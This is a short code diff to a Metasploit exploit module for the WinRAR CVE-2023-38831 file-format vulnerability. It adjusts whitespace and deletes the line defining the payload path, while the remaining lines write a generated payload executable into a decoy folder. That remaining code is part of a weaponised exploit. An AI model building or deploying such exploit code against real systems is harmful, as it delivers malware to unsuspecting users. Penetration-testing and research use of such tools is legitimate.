diff --git a/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb b/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb index bb88c3b5100d..776d0dee7489 100644 --- a/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb +++ b/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE - + def initialize(info = {}) super( update_info( @@ -64,7 +64,6 @@ def exploit decoy_dir = File.join(temp_dir, "#{decoy_name}A") Dir.mkdir(decoy_dir) - payload_path = File.join(decoy_dir, payload_name) File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }